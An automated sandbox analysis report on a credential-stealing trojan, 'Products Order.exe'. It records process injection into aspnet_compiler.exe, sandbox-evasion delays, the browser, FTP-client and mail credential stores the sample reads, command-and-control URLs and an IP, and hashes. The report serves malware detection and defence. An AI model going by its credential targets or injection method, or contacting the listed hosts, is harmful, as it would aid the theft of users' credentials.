                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeMemory allocated: A30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeMemory allocated: 1A8E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exe TID: 5052Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6148Thread sleep time: -420000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
                  Source: C:\Users\user\Desktop\Products Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60000Jump to behavior
                  Source: Products Order.exe, 00000000.00000002.1969470285.0000000012940000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                  Source: Products Order.exe, 00000000.00000002.1969470285.0000000012989000.00000004.00000800.00020000.00000000.sdmp, Products Order.exe, 00000000.00000002.1969470285.00000000129D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                  Source: Products Order.exeBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
                  Source: aspnet_compiler.exe, 00000002.00000002.3204897255.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                  Source: Products Order.exe, 00000000.00000002.1969470285.0000000012A19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
                  Source: C:\Users\user\Desktop\Products Order.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Products Order.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000Jump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000Jump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000Jump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 2DE008Jump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeQueries volume information: C:\Users\user\Desktop\Products Order.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Products Order.exe PID: 3436, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5352, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000002.00000002.3204897255.0000000000778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Products Order.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Products Order.exe.430000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1960275029.00000000004B6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: PopPassword2_2_0040D069
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: SmtpPassword2_2_0040D069
                  Source: Yara matchFile source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Products Order.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Products Order.exe.430000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1960275029.00000000004B6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading
                  1
                  Access Token Manipulation
                  1
                  Masquerading
                  2
                  OS Credential Dumping
                  11
                  Security Software Discovery
                  Remote Services1
                  Email Collection
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                  Process Injection
                  1
                  Disable or Modify Tools
                  2
                  Credentials in Registry
                  31
                  Virtualization/Sandbox Evasion
                  Remote Desktop Protocol1
                  Archive Collected Data
                  3
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading
                  31
                  Virtualization/Sandbox Evasion
                  Security Account Manager1
                  File and Directory Discovery
                  SMB/Windows Admin Shares2
                  Data from Local System
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Access Token Manipulation
                  NTDS13
                  System Information Discovery
                  Distributed Component Object ModelInput Capture112
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script311
                  Process Injection
                  LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Deobfuscate/Decode Files or Information
                  Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Obfuscated Files or Information
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                  Software Packing
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  DLL Side-Loading
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Products Order.exe100%AviraTR/Dropper.MSIL.Gen
                  Products Order.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                  http://kbfvzoboss.bid/alien/fre.php100%Sophos S4malware callhome uri
                  45.90.57.51/big/five/fre.php100%Sophos S4malware callhome uri
                  http://alphastand.win/alien/fre.php100%URL Reputationmalware
                  http://alphastand.win/alien/fre.php100%Sophos S4malware callhome uri
                  http://45.90.57.51/big/five/fre.php100%Sophos S4malware callhome uri
                  http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                  http://alphastand.trade/alien/fre.php100%Sophos S4malware callhome uri
                  http://alphastand.top/alien/fre.php100%URL Reputationmalware
                  http://alphastand.top/alien/fre.php100%Sophos S4malware callhome uri
                  http://www.ibsensoftware.com/0%URL Reputationsafe
                  45.90.57.51/big/five/fre.php100%Avira URL Cloudmalware
                  http://45.90.57.51/big/five/fre.php100%Avira URL Cloudmalware
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://kbfvzoboss.bid/alien/fre.phptrue
                  • URL Reputation: malware
                  • Sophos S4: malware callhome uri
                  unknown
                  45.90.57.51/big/five/fre.phptrue
                  • Sophos S4: malware callhome uri
                  • Avira URL Cloud: malware
                  unknown
                  http://alphastand.win/alien/fre.phptrue
                  • URL Reputation: malware
                  • Sophos S4: malware callhome uri
                  unknown
                  http://45.90.57.51/big/five/fre.phptrue
                  • Sophos S4: malware callhome uri
                  • Avira URL Cloud: malware
                  unknown
                  http://alphastand.trade/alien/fre.phptrue
                  • URL Reputation: malware
                  • Sophos S4: malware callhome uri
                  unknown
                  http://alphastand.top/alien/fre.phptrue
                  • URL Reputation: malware
                  • Sophos S4: malware callhome uri
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.ibsensoftware.com/aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  45.90.57.51
                  unknownBulgaria
                  204957GREENFLOID-ASUAtrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1442315
                  Start date and time:2024-05-16 00:36:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 32s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Products Order.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/3@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 39
                  • Number of non-executed functions: 5
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: Products Order.exe
                  TimeTypeDescription
                  00:36:54API Interceptor60x Sleep call for process: aspnet_compiler.exe modified
                  No context
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  GREENFLOID-ASUAhttps://github.com/oLDschollBozz/BF2042GalaxyGet hashmaliciousPureLog Stealer, zgRATBrowse
                  • 91.90.195.152
                  SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllGet hashmaliciousCobaltStrikeBrowse
                  • 45.90.59.193
                  History123456.zipGet hashmaliciousUnknownBrowse
                  • 195.123.246.26
                  YxcXefg5QE.exeGet hashmaliciousUnknownBrowse
                  • 82.118.21.69
                  YxcXefg5QE.exeGet hashmaliciousUnknownBrowse
                  • 82.118.21.69
                  nDoc_032056193.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 82.118.21.69
                  Doc_1009675287pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 82.118.21.69
                  helper.exeGet hashmaliciousAZORult++Browse
                  • 45.90.58.1
                  helper(1).exeGet hashmaliciousAZORult++Browse
                  • 45.90.58.1
                  helper.exeGet hashmaliciousAZORult++Browse
                  • 45.90.58.1
                  No context
                  No context
                  Process:C:\Users\user\Desktop\Products Order.exe
                  File Type:CSV text
                  Category:dropped
                  Size (bytes):654
                  Entropy (8bit):5.380476433908377
                  Encrypted:false
                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):47
                  Entropy (8bit):1.168829563685559
                  Encrypted:false
                  SSDEEP:3:/lSll2DQi:AoMi
                  MD5:DAB633BEBCCE13575989DCFA4E2203D6
                  SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                  SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                  SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:........................................user.
                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):4.10191984815915
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:Products Order.exe
                  File size:775'680 bytes
                  MD5:ab09f11ddb556069549717cc1f37fdc1
                  SHA1:e4cba5e88d12df5f9b0eb1dab978b48d63f6b57b
                  SHA256:6946d0d3322995d1c4a8f407b8a627e37644dcc4ddef07b97167f9a4e57b0ee1
                  SHA512:c85c518d4216cb9316f96d70240093f4193e5817d761623371f9d6cb011c6d2cb2b8c78162bde04e46baa3add624bdb87c9a506eff97326a34b6a271192f34ba
                  SSDEEP:3072:dYbDPtd2epEFbMkbNZG46Xz3kFE0bFd+m0de2fcRMBLEFx11Hiv2MN+lEEUMIbhp:2BjkbNNhNHG+96+ixbcdWtoBr
                  TLSH:C2F400BB286A51D9F261AD386B7CBC768219E7FD25F50C730CFE051680125F18BED226
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....uDf.................8..........^V... ...`....@.. ....................... ............@................................
                  Icon Hash:0008102000000182
                  Entrypoint:0x49565e
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6644758A [Wed May 15 08:42:50 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
